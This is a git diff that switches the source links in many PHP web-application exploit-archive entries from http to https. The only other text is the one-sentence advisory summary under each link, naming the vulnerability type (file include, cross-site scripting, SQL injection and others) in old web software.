@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22704/info +source: https://www.securityfocus.com/bid/22704/info Active Calendar is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29646.txt b/exploits/php/webapps/29646.txt index 9a2cc287d..913db8586 100644 --- a/exploits/php/webapps/29646.txt +++ b/exploits/php/webapps/29646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29647.txt b/exploits/php/webapps/29647.txt index 0837dc36f..be80e8ac4 100644 --- a/exploits/php/webapps/29647.txt +++ b/exploits/php/webapps/29647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29648.txt b/exploits/php/webapps/29648.txt index e18309b98..10dc4c76d 100644 --- a/exploits/php/webapps/29648.txt +++ b/exploits/php/webapps/29648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29649.txt b/exploits/php/webapps/29649.txt index 8b96c7f84..335e2d1ab 100644 --- a/exploits/php/webapps/29649.txt +++ b/exploits/php/webapps/29649.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29650.txt b/exploits/php/webapps/29650.txt index d4fec43e2..7b9b1b1c0 100644 --- a/exploits/php/webapps/29650.txt +++ b/exploits/php/webapps/29650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29651.txt b/exploits/php/webapps/29651.txt index ed587044e..da7a8f791 100644 --- a/exploits/php/webapps/29651.txt +++ b/exploits/php/webapps/29651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29652.txt b/exploits/php/webapps/29652.txt index efe088637..91bf04c5a 100644 --- a/exploits/php/webapps/29652.txt +++ b/exploits/php/webapps/29652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29653.txt b/exploits/php/webapps/29653.txt index e044dcbe7..f7ccaee19 100644 --- a/exploits/php/webapps/29653.txt +++ b/exploits/php/webapps/29653.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22705/info +source: https://www.securityfocus.com/bid/22705/info Active Calendar is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29658.txt b/exploits/php/webapps/29658.txt index 9c286f9cc..caf583183 100644 --- a/exploits/php/webapps/29658.txt +++ b/exploits/php/webapps/29658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22707/info +source: https://www.securityfocus.com/bid/22707/info PhotoStand is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29663.txt b/exploits/php/webapps/29663.txt index 2f8b65aaa..1c4944ee4 100644 --- a/exploits/php/webapps/29663.txt +++ b/exploits/php/webapps/29663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22722/info +source: https://www.securityfocus.com/bid/22722/info SolarPay is prone to a local file-include vulnerability because the utility fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29665.txt b/exploits/php/webapps/29665.txt index fecfa7386..ab9155f16 100644 --- a/exploits/php/webapps/29665.txt +++ b/exploits/php/webapps/29665.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22727/info +source: https://www.securityfocus.com/bid/22727/info SQLiteManager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29679.html b/exploits/php/webapps/29679.html index 60bd9b2fd..d6a7e8af4 100644 --- a/exploits/php/webapps/29679.html +++ b/exploits/php/webapps/29679.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22730/info +source: https://www.securityfocus.com/bid/22730/info PHPBB2 is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access. diff --git a/exploits/php/webapps/29680.html b/exploits/php/webapps/29680.html index 6d733e89e..a729f7135 100644 --- a/exploits/php/webapps/29680.html +++ b/exploits/php/webapps/29680.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22731/info +source: https://www.securityfocus.com/bid/22731/info SQLiteManager is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29681.txt b/exploits/php/webapps/29681.txt index 011875c02..cf3ef8245 100644 --- a/exploits/php/webapps/29681.txt +++ b/exploits/php/webapps/29681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22733/info +source: https://www.securityfocus.com/bid/22733/info Pagesetter is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29682.txt b/exploits/php/webapps/29682.txt index d95a6041e..0ac16d255 100644 --- a/exploits/php/webapps/29682.txt +++ b/exploits/php/webapps/29682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22735/info +source: https://www.securityfocus.com/bid/22735/info Wordpress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29684.txt b/exploits/php/webapps/29684.txt index c3de6c007..9f0b82f72 100644 --- a/exploits/php/webapps/29684.txt +++ b/exploits/php/webapps/29684.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22738/info +source: https://www.securityfocus.com/bid/22738/info Wordpress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29694.txt b/exploits/php/webapps/29694.txt index e24c3a759..fac498256 100644 --- a/exploits/php/webapps/29694.txt +++ b/exploits/php/webapps/29694.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22774/info +source: https://www.securityfocus.com/bid/22774/info Serendipity is affected by an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29696.txt b/exploits/php/webapps/29696.txt index b93040e31..244e1b388 100644 --- a/exploits/php/webapps/29696.txt +++ b/exploits/php/webapps/29696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22781/info +source: https://www.securityfocus.com/bid/22781/info aWebNews is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29697.txt b/exploits/php/webapps/29697.txt index 6f37bfcf9..5fa493556 100644 --- a/exploits/php/webapps/29697.txt +++ b/exploits/php/webapps/29697.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22783/info +source: https://www.securityfocus.com/bid/22783/info Built2Go News Manager Blog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29698.txt b/exploits/php/webapps/29698.txt index 1be58b40f..0378dfde7 100644 --- a/exploits/php/webapps/29698.txt +++ b/exploits/php/webapps/29698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22783/info +source: https://www.securityfocus.com/bid/22783/info Built2Go News Manager Blog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/29700.txt b/exploits/php/webapps/29700.txt index e9bbdc2fe..7663a4ce3 100644 --- a/exploits/php/webapps/29700.txt +++ b/exploits/php/webapps/29700.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22796/info +source: https://www.securityfocus.com/bid/22796/info Woltlab Burning Board is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/29701.txt b/exploits/php/webapps/29701.txt index 9bc64410e..f09b285d4 100644 --- a/exploits/php/webapps/29701.txt +++ b/exploits/php/webapps/29701.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22797/info +source: https://www.securityfocus.com/bid/22797/info An attacker compromised the source code for Wordpress 2.1.1 and altered it to include a malicious backdoor. This backdoor introduces a code-execution vulnerability that will let remote users inject PHP code or execute operating system commands. diff --git a/exploits/php/webapps/29702.txt b/exploits/php/webapps/29702.txt index 44f9e50be..5c5832501 100644 --- a/exploits/php/webapps/29702.txt +++ b/exploits/php/webapps/29702.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22797/info +source: https://www.securityfocus.com/bid/22797/info An attacker compromised the source code for Wordpress 2.1.1 and altered it to include a malicious backdoor. This backdoor introduces a code-execution vulnerability that will let remote users inject PHP code or execute operating system commands. diff --git a/exploits/php/webapps/29703.txt b/exploits/php/webapps/29703.txt index 7a01da9c3..94bd9beae 100644 --- a/exploits/php/webapps/29703.txt +++ b/exploits/php/webapps/29703.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22799/info +source: https://www.securityfocus.com/bid/22799/info Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, including one SQL-injection issue and two cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29704.txt b/exploits/php/webapps/29704.txt index 8c28fce71..b8a1bb301 100644 --- a/exploits/php/webapps/29704.txt +++ b/exploits/php/webapps/29704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22799/info +source: https://www.securityfocus.com/bid/22799/info Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, including one SQL-injection issue and two cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29705.txt b/exploits/php/webapps/29705.txt index 4d318d9bd..292782c5e 100644 --- a/exploits/php/webapps/29705.txt +++ b/exploits/php/webapps/29705.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22799/info +source: https://www.securityfocus.com/bid/22799/info Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, including one SQL-injection issue and two cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29715.txt b/exploits/php/webapps/29715.txt index 66bc47ad3..e79b218a8 100644 --- a/exploits/php/webapps/29715.txt +++ b/exploits/php/webapps/29715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22829/info +source: https://www.securityfocus.com/bid/22829/info ePortfolio is prone to a client-side input-validation vulnerability because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29722.txt b/exploits/php/webapps/29722.txt index c975f26d7..b635f0c59 100644 
--- a/exploits/php/webapps/29722.txt +++ b/exploits/php/webapps/29722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22894/info +source: https://www.securityfocus.com/bid/22894/info URLshrink Free is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29727.txt b/exploits/php/webapps/29727.txt index 58ba570c0..a6443fce6 100644 --- a/exploits/php/webapps/29727.txt +++ b/exploits/php/webapps/29727.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22912/info +source: https://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29728.txt b/exploits/php/webapps/29728.txt index 92382ef8b..afec5dec2 100644 --- a/exploits/php/webapps/29728.txt +++ b/exploits/php/webapps/29728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22912/info +source: https://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29729.txt b/exploits/php/webapps/29729.txt index 7331b7eb4..2aa564942 100644 --- a/exploits/php/webapps/29729.txt +++ b/exploits/php/webapps/29729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22912/info +source: https://www.securityfocus.com/bid/22912/info Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29730.txt b/exploits/php/webapps/29730.txt index 189ee9b9d..55f283c15 100644 --- a/exploits/php/webapps/29730.txt +++ b/exploits/php/webapps/29730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22913/info +source: https://www.securityfocus.com/bid/22913/info DataLife Engine is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29731.txt b/exploits/php/webapps/29731.txt index fd358acfa..122180cdf 100644 --- a/exploits/php/webapps/29731.txt 
+++ b/exploits/php/webapps/29731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22913/info +source: https://www.securityfocus.com/bid/22913/info DataLife Engine is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29736.txt b/exploits/php/webapps/29736.txt index 5ee0ac921..009d7f81a 100644 --- a/exploits/php/webapps/29736.txt +++ b/exploits/php/webapps/29736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22928/info +source: https://www.securityfocus.com/bid/22928/info ClipShare is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29737.txt b/exploits/php/webapps/29737.txt index 5baf40939..985c0b61e 100644 --- a/exploits/php/webapps/29737.txt +++ b/exploits/php/webapps/29737.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22937/info +source: https://www.securityfocus.com/bid/22937/info Weekly Drawing Contest is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29742.txt b/exploits/php/webapps/29742.txt index 458908a22..8aa57618f 100644 --- a/exploits/php/webapps/29742.txt +++ b/exploits/php/webapps/29742.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22975/info +source: https://www.securityfocus.com/bid/22975/info Horde IMP Webmail Client is prone to multiple input-validation vulnerabilities, including cross-site scripting and an HTML-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29744.txt b/exploits/php/webapps/29744.txt index 761d32bb8..76b5f9646 100644 --- a/exploits/php/webapps/29744.txt +++ b/exploits/php/webapps/29744.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22979/info +source: https://www.securityfocus.com/bid/22979/info Viper Web Portal is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29745.txt b/exploits/php/webapps/29745.txt index 1103cd83e..a619a6e5b 100644 --- a/exploits/php/webapps/29745.txt +++ b/exploits/php/webapps/29745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22984/info +source: https://www.securityfocus.com/bid/22984/info Horde Framework is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29747.txt b/exploits/php/webapps/29747.txt index 9e9f610a2..133185f91 100644 --- a/exploits/php/webapps/29747.txt +++ b/exploits/php/webapps/29747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22996/info +source: https://www.securityfocus.com/bid/22996/info DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29748.txt b/exploits/php/webapps/29748.txt index 5cbb5fefc..d8e565945 100644 --- a/exploits/php/webapps/29748.txt +++ b/exploits/php/webapps/29748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22997/info +source: https://www.securityfocus.com/bid/22997/info Holtstraeter Rot 13 is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29750.php b/exploits/php/webapps/29750.php index 33fb47efb..c1d07f9d9 100644 --- a/exploits/php/webapps/29750.php +++ b/exploits/php/webapps/29750.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23003/info +source: https://www.securityfocus.com/bid/23003/info Php-Stats is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29751.php b/exploits/php/webapps/29751.php index 788db602a..474a1645d 100644 --- a/exploits/php/webapps/29751.php +++ b/exploits/php/webapps/29751.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23008/info +source: https://www.securityfocus.com/bid/23008/info PhpStats is prone to a remote code-execution vulnerability because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/29754.html b/exploits/php/webapps/29754.html index ac2c80908..6e564b71a 100644 --- a/exploits/php/webapps/29754.html +++ b/exploits/php/webapps/29754.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23027/info +source: https://www.securityfocus.com/bid/23027/info WordPress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29755.html b/exploits/php/webapps/29755.html index b3e7c1331..6b165c549 100644 --- a/exploits/php/webapps/29755.html +++ b/exploits/php/webapps/29755.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23029/info +source: https://www.securityfocus.com/bid/23029/info Guesbara is prone to a vulnerability that may permit attackers to change the administrative password. diff --git a/exploits/php/webapps/29756.txt b/exploits/php/webapps/29756.txt index 8c65650c2..7a0224806 100644 --- a/exploits/php/webapps/29756.txt +++ b/exploits/php/webapps/29756.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29757.txt b/exploits/php/webapps/29757.txt index daca22472..d8b48cba2 100644 --- a/exploits/php/webapps/29757.txt +++ b/exploits/php/webapps/29757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29758.txt b/exploits/php/webapps/29758.txt index 00b7e9946..08ed71910 100644 --- a/exploits/php/webapps/29758.txt +++ b/exploits/php/webapps/29758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29759.php b/exploits/php/webapps/29759.php index feb2024a4..2d487bbcc 100644 --- a/exploits/php/webapps/29759.php +++ b/exploits/php/webapps/29759.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29760.txt b/exploits/php/webapps/29760.txt index fce025bbe..947ec4191 100644 --- a/exploits/php/webapps/29760.txt +++ b/exploits/php/webapps/29760.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23033/info +source: https://www.securityfocus.com/bid/23033/info PHPX is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29762.txt b/exploits/php/webapps/29762.txt index 33cb0b670..5b75a63ed 100644 --- a/exploits/php/webapps/29762.txt +++ b/exploits/php/webapps/29762.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23051/info +source: https://www.securityfocus.com/bid/23051/info Web Wiz Forums is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29763.php b/exploits/php/webapps/29763.php index bfb0c8437..0036ed47a 100644 --- a/exploits/php/webapps/29763.php +++ b/exploits/php/webapps/29763.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23055/info +source: https://www.securityfocus.com/bid/23055/info w-Agora is prone to multiple arbitrary file-upload vulnerabilities. diff --git a/exploits/php/webapps/29764.txt b/exploits/php/webapps/29764.txt index f53c61661..492034e1d 100644 --- a/exploits/php/webapps/29764.txt +++ b/exploits/php/webapps/29764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23057/info +source: https://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29765.txt b/exploits/php/webapps/29765.txt index 8f5dddde5..a6164c03a 100644 --- a/exploits/php/webapps/29765.txt +++ b/exploits/php/webapps/29765.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23057/info +source: https://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29766.txt b/exploits/php/webapps/29766.txt index 73f9f7270..b39c14fe7 100644 --- a/exploits/php/webapps/29766.txt +++ b/exploits/php/webapps/29766.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23057/info +source: https://www.securityfocus.com/bid/23057/info w-Agora is prone to multiple input-validation vulnerabilities, including possible SQL-injection issues and multiple cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29772.txt b/exploits/php/webapps/29772.txt index 1b1586f8b..c3e9aa6a7 100644 --- a/exploits/php/webapps/29772.txt +++ b/exploits/php/webapps/29772.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23118/info +source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29773.txt b/exploits/php/webapps/29773.txt index fc19d9cb9..87dff3504 100644 --- a/exploits/php/webapps/29773.txt +++ b/exploits/php/webapps/29773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23118/info +source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29774.txt b/exploits/php/webapps/29774.txt index bfa917f97..4f14c4bcb 100644 --- a/exploits/php/webapps/29774.txt +++ b/exploits/php/webapps/29774.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23118/info +source: https://www.securityfocus.com/bid/23118/info Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29775.txt b/exploits/php/webapps/29775.txt index 04b7a0052..03f834cef 100644 --- a/exploits/php/webapps/29775.txt +++ b/exploits/php/webapps/29775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23132/info +source: https://www.securityfocus.com/bid/23132/info Image_Upload Script is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29776.txt b/exploits/php/webapps/29776.txt index 954fb41ed..4a0a8c094 100644 --- a/exploits/php/webapps/29776.txt +++ b/exploits/php/webapps/29776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23135/info +source: https://www.securityfocus.com/bid/23135/info CcCounter is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29780.txt b/exploits/php/webapps/29780.txt index c0c2c8acf..560820724 100644 --- a/exploits/php/webapps/29780.txt +++ b/exploits/php/webapps/29780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23141/info +source: https://www.securityfocus.com/bid/23141/info Mephisto Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29782.txt b/exploits/php/webapps/29782.txt index 7975e8345..73c71dac9 100644 --- a/exploits/php/webapps/29782.txt +++ b/exploits/php/webapps/29782.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23143/info +source: https://www.securityfocus.com/bid/23143/info Satel Lite is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29783.txt b/exploits/php/webapps/29783.txt index 2a60ea7ed..c5cd109de 100644 --- a/exploits/php/webapps/29783.txt +++ b/exploits/php/webapps/29783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23144/info +source: https://www.securityfocus.com/bid/23144/info Fizzle is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/29786.txt b/exploits/php/webapps/29786.txt index d94585d30..5f6133fc1 100644 --- a/exploits/php/webapps/29786.txt +++ b/exploits/php/webapps/29786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23167/info +source: https://www.securityfocus.com/bid/23167/info aBitWhizzy is prone to multiple cross-site scripting and directory-traversal vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29805.txt b/exploits/php/webapps/29805.txt index ee27aff61..c03e07968 100644 --- a/exploits/php/webapps/29805.txt +++ b/exploits/php/webapps/29805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23215/info +source: https://www.securityfocus.com/bid/23215/info Drake CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29806.pl b/exploits/php/webapps/29806.pl index 6fe8a9ab9..43002e229 100755 --- a/exploits/php/webapps/29806.pl +++ b/exploits/php/webapps/29806.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23225/info +source: https://www.securityfocus.com/bid/23225/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29821.txt b/exploits/php/webapps/29821.txt index 896fabe37..9993b7cf8 100644 --- a/exploits/php/webapps/29821.txt +++ b/exploits/php/webapps/29821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23353/info +source: https://www.securityfocus.com/bid/23353/info Livor is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29824.txt b/exploits/php/webapps/29824.txt index 7d70c657e..b6d428715 100644 --- a/exploits/php/webapps/29824.txt +++ b/exploits/php/webapps/29824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23368/info +source: https://www.securityfocus.com/bid/23368/info QuizShock is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29825.txt b/exploits/php/webapps/29825.txt index bf15a6c9c..d40256cdb 100644 --- a/exploits/php/webapps/29825.txt +++ b/exploits/php/webapps/29825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23369/info +source: https://www.securityfocus.com/bid/23369/info UBB.threads is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29827.pl b/exploits/php/webapps/29827.pl index 7d50dd96e..0308a7c3c 100755 --- a/exploits/php/webapps/29827.pl +++ b/exploits/php/webapps/29827.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23377/info +source: https://www.securityfocus.com/bid/23377/info eCardMAX HotEditor is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29828.html b/exploits/php/webapps/29828.html index f03085de7..95ddd2d83 100644 --- a/exploits/php/webapps/29828.html +++ b/exploits/php/webapps/29828.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23381/info +source: https://www.securityfocus.com/bid/23381/info DeskPRO is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29829.txt b/exploits/php/webapps/29829.txt index 670da895a..d49a5a064 100644 --- a/exploits/php/webapps/29829.txt +++ b/exploits/php/webapps/29829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23395/info +source: https://www.securityfocus.com/bid/23395/info Einfacher Passworschutz is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29830.txt b/exploits/php/webapps/29830.txt index 1d043f216..70ad13f17 100644 --- a/exploits/php/webapps/29830.txt +++ b/exploits/php/webapps/29830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23398/info +source: https://www.securityfocus.com/bid/23398/info MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29831.txt b/exploits/php/webapps/29831.txt index 4f48dbaf8..597901f5f 100644 --- a/exploits/php/webapps/29831.txt +++ b/exploits/php/webapps/29831.txt 
